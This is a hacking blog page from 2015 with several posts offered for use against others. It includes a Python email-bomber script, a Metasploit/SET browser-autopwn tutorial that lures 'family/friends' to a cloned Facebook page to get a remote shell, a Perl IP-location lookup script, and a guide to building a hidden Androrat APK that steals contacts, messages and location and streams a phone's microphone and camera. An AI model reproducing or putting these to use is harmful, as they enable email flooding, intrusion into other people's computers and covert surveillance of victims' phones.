adse

We are not professional , We make the peoples professional !!

Monday, 16 February 2015

[Python] Black mail Bomber script


MAIL BOMBER BY IHC (CYBER HACKER)
#!/usr/bin/env python
# 10/12/09 by Team IHC ::
import smtplib
print “================================”
print “**THIS*IS*THE*BLACK*MAIL*BOMBER*”
print “*CONTACT:*WWW.Facebook.com/itsmehulbhatt*”
print “********05/01/2015**BY**********”
print “**********Cyb3r_h4ck3r***********”
print “================================”
i=0
def prompt(prompt):
return raw_input(prompt).strip()
fromaddr = prompt(“From: “)
toaddrs = prompt(“To: “).split()
mailsent = prompt(“How many mails would you send ? “)
print “Enter message, end with double/triple ‘ENTER’ (Unix & Dos):”
msg = (“From: %srnTo: %srnrn”
% (fromaddr, “, “.join(toaddrs)))
while 1:
try:
line = raw_input()
except EOFError:
break
if not line:
break
msg = msg + line
# print “Message length is ” + repr(len(msg))
while int(i) < int(mailsent):
i = i + 1
server = smtplib.SMTP(‘localhost’)
server.set_debuglevel(0)
server.sendmail(fromaddr, toaddrs, msg)
server.quit()
print “## MAIL-COUNTER ## =”, i
Continue Reading…

How to break into someone’s computer with Metasploit


Introduction to Metasploit Framework
Today I’m gonna write this tutorial about the Metasploit Framework 3. First of all sorry for my bad English.
I’ve seen that most of the people don’t know what Metasploit is. I discovered this for a few months ago and absolutely love(d) it :). So… What is Metasploit?
Metasploit is a open source framework widely used by IT security professionals. It was developed mainly for penetration tests and also to search for vulnerabilities. You can download the framework for free on http://www.metasploit.com/ . Although I would advise you to download Backtrack 5 and install it on your PC because it includes SET(Social Engineer Toolkit) and we’ll need that. Metasploit includes several tools(msfconsole, msfweb, msfcli, msflogdump, msfpayload, msfpescan, msfencode, msfupdate). We’ll use msfconsole that is metasploit in console mode.
Ok, I think it’s enough :D. Let’s start exploring this powerful tool :)…. For this tutorial I’ll show you how to break into someone’s computer with Metasploit and fully compromise his/her system. Keep in mind that unless you have a public IP address this will only work on your local network. Assign a public IP address isn’t difficult, I can write how to do that if someone’s want.
The first thing you need to do is to find your IP address. To do that open the “Terminal” and type ifconfig. Looks confusing? :P. No, it isn’t, at all :).
My screen looks like that(I’ll not post screenshots)
root@bt:~# ifconfig
eth0 Link encap:Ethernet HWaddr 00:19:66:3e:bb:6e
MY IP ADDRESS -> inet addr:192.168.1.65 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fe80::219:66ff:fe3e:bb6e/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:17901 errors:0 dropped:0 overruns:0 frame:0
TX packets:13416 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:24164235 (24.1 MB) TX bytes:1282971 (1.2 MB)
Interrupt:23 Base address:0x6800
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:263 errors:0 dropped:0 overruns:0 frame:0
TX packets:263 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:34025 (34.0 KB) TX bytes:34025 (34.0 KB)
Your IP address is after inet addr:. In my case my IP address is 192.168.1.65. Quite simple right? :D .I think the rest is also easy to understand.
Don’t forget your IP, you’ll need it later so the “victim” can connect to you :).
Now.. Let’s navigate to SET directory. If you have Backtrack 5 you can copy what I type, but I advise you to write for your own, just to get used with this :). So.. I typed this:
Code:
root@bt:~# cd ..
root@bt:/# cd pentest/exploits/set/
See? We’re in the SET directory. Run the SET interface by typing:
Code:
root@bt:/pentest/exploits/set# ./set
If you get something like this, congratulations, you’re in the SET interface :DD. Not bad for now :P.
bla bla bla bla.
Hehe this is a new world ready to explore :D. All the exploits to this options :D. This is why I love Metasploit + SET, they include new exploits every day :). And of course you can create your own exploits :P, just need to know how to code WELL in Ruby :). Hum what you don’t know is that on this list we have a very special exploit that makes our work a lot easier :). That exploit is number 24( 24. Metasploit Browser Autopwn (USE AT OWN RISK!)). Basically it runs all the 23 exploits and choose the most suitable to the victim PC :). I always use that, it’s the one that can be more dangerous :)
Yeah, everything just seems PERFECT! :) And actually is xD. And you can see that it load 22 exploit modules, or in other words, all of them :)
Now, it’s the most important part and the most exciting too. You’re ready to break into your family/friends computer hehe. You have to convince them to open the site http://192.168.1.65 . As you can see we started a server that cloned a website, facebook. Remember? Now, when they put on the browser http://192.168.1.65 it’ll open Facebook and you’ll start receiving packets :). Don’t forget, IP addresses that start with 192.168. only work on your local network. Also, I highly reccomend you to test this on Internet Explorer. Let’s continue…. Not today, I’ll continue tomorrow :). Anyway I think you can start exploring this amazing tool ;). Good luck :). Tomorow I’ll finish this .
Ok, I’m back :P.(just joking) Let’s finish this. Supposing that you did everything like I explained you should now be receiving packets.
Now you should write sessions. It’ll show you all the connections available at that moment and each one has a unique ID. Imagine that the ID is equal to 1. In order to connect to that PC you must write on the terminal the following:
Code:
sessions -i 1
1 represents the ID. Now you’ll receive a message saying something like:
Code:
[ * ] Starting interaction with 1….
As I said the number may be different, depending on the ID. Well, now you’re basically done :D.
You’ll get a screen where it appears this:
Code:
meterpreter >
Now type help and explore all those awesome functionalities :DD.
There is different ways to do the same, I found one especially better. Let me know if you want to see another tutorial from me… Sites of ‪#‎Team_IHC‬ ..visit n see new posts 
smile emoticon 
http://team-ihc.in
http://team-ihc.com
http://indianhackerscolony.net
http://indianhackerscolony.com
http://indianhackerscolony.blogspot.in
Continue Reading…

IHC ip location and info finder script



PERL -- >

#!/usr/bin/perl
use Socket;
use Term::ANSIColor;
# Information from IP or host
# Code by Cyb3r h4ck3r
# http://www.Facebook.com/itsmehulbhatt
print color ‘bold green';
print “*================================================*n”;
print “[IHC IP – Location and information from IP address]n”;
print ” By Cyb3r h4ck3r http://www.facebook.com/itsmehulbhatt n”;
print “*================================================*n”;
print “n”;
print color ‘reset';
@iphost=$ARGV[0] || die “Use: IPloc nEx: IPloc www.google.com n IPloc 74.125.224.208n n”;
my @ip = inet_ntoa(scalar gethostbyname(“@iphost”)or die “Ip ou Host invalidon”);
my @hn = scalar gethostbyaddr(inet_aton(@ip),AF_INET);
#@dados=(“curl -s ‘http://api.ipinfodb.com/v3/ip-city/?key=e9deb425dd071948093f827111646df275796975eb55da00fe7a0a7c633a907b&format=text&ip=@ip'”);
@dados=(“curl -s ‘http://ip-api.com/@ip'”);
print color ‘bold green';
print”*========*===================================*n”;
print”ISP: tt”;system(“@dados | grep ‘ISP:’ |cut -d ‘>’ -f6 | cut -d ‘<' -f1");
print"ORG: tt";system("@dados | grep 'Organization:' |cut -d '>‘ -f6 | cut -d ‘<' -f1");
print"+--------------------------------------------*n";
print"|IP | @ipn";
print"|Hostname| @hnn";
print"|País | ";system("@dados | grep 'Country:' |cut -d '>‘ -f6 | cut -d ‘<' -f1");
print"|Estado | ";system("@dados | grep 'Region:' |cut -d '>‘ -f6 | cut -d ‘<' -f1");
print"|Cidade | ";system("@dados | grep 'City:' |cut -d '>‘ -f6 | cut -d ‘<' -f1");
print"|Lat | ";system("@dados | grep 'Latitude:' |cut -d '>‘ -f6 | cut -d ‘<' -f1");
print"|Long | ";system("@dados | grep 'Longitude:' |cut -d '>‘ -f6 | cut -d ‘<’ -f1″);
print”*========*====================================*n”;
print color ‘reset';
Continue Reading…

Saturday, 7 February 2015

Androrat full tut + port forwarding


Androrat (RAT For Android)
 
Androrat is a client/server application developed in Java Android for the client side and in Java/Swing for the Server.The name Androrat is a mix of Android and RAT (Remote Access Tool).The goal of the application is to give the control of the android system remotely and retrieve informations from it.

 Features

Get contacts (and all theirs informations)Get call logsGet all messagesLocation by GPS/NetworkMonitoring received messages in liveMonitoring phone state in live (call received, call sent, call missed..)Take a picture from the cameraStream sound from microphone (or other sources..)Streaming video (for activity based client only)Do a toastSend a text messageGive callOpen an URL in the default browserDo vibrate the phone

How to configure Androrat :

Setting up host 

You have to  make a id on Here and create a host.

Port forwrad/open

You need to open port you want to use.  To do that Open Control panel > Network & Internet > Network & Sharing centre Then click on see full map option Right-Click on the Gateway or router>Properties In general tab, Go to settings , Click on add In Description of service , Write Androrat Now you have to check your ip, To Do this , open command prompt, type ipconfig, Scroll To ethernet Adapter local area connection,and note down the ipv4 address Now come back to Add window , in the name or ip address type the ipv4 address you have noted Now in the external & internal port number , type 81 , tcp should be selected, click ok Now click on Add button again…Now in Description , write androrat 1 In the name or ip address, type the ipv4 address you have noted Now in the external & internal port number , type 81 , udp should be selected, click ok.

Bulilding the apk file

Now extract the file , Open AndroRat Binder.exe.Go to No-ip tab and fill your information & click on update.Go to Build Tab.In IP section, type the hostname  you have created by no-ip.In port section , type 81.In apk title ,Type any title you want.Check the hidden box to hide the apk from mobile’s app drawer.Click on
Go.

Setting up victim

Now you will see the apk with the title you have given in the extracted folder.

Now install that apk to any android mobile phone.




You will find a folder named Androrat in the extracted files.Open Androrat>Androrat.jar (you should have java installed in your pc to open it).Now click on server> Select port and enter 81, click ok & restart it.Now , as soon as the android client is online , you will find it on the jar file ……select any server online.

Now what we just sucked victim off :p

Continue Reading…

Donate us ur one click

Like us

Popular Posts

Total Pageviews

Translate

Google Ranking Cross Site Scripting

Copyright © Indian Hacker's Colony | Powered by Blogger
Design by Saeed Salam | Blogger Theme by NewBloggerThemes.com | Distributed By Gooyaabi Templates